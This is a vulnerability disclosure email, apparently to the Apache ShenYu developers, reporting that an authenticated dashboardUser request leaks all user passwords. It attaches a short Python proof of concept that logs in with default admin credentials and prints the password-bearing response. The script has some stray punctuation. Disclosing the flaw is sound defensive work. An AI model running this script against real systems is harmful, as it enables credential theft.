Dear Developers of Apache Shenyu,
I am reaching you as I was reviewing your application and there is a
password leakage in the application.
It means that when a user will request the following URL
"dashboardUser?currentPage=1&pageSize=12", the response will disclose all
the passswords of the users.
[image: image.png]
It is not critical as you need to be authenticated but still it is a bad
practice.
I have attached a Python script to reproduce the issue. You need to set the
information (host, username & password) use it.
Feel free to reach me should you have questions.
Regards,
Gregory
--
Grégory Draperi
import jwt
import time
import requests
import json
import sys
import argparse
requests.packages.urllib3.disable_warnings()
if __name__ == '__main__':
print("start");
url = "http://127.0.0.1:9095";;
username = "admin";
password = "123456";
payload = {"userName":"admin","password":"123456"};
r = requests.get("http://127.0.0.1:9095/platform/login";, params=payload);
print(json.loads(r.text)['data']['token']);
token = json.loads(r.text)['data']['token'];
headers = {'X-Access-Token': token}
r2 = requests.get('http://127.0.0.1:9095/dashboardUser?currentPage=1&pageSize=12', headers=headers);
print(r2.text);
print("end");
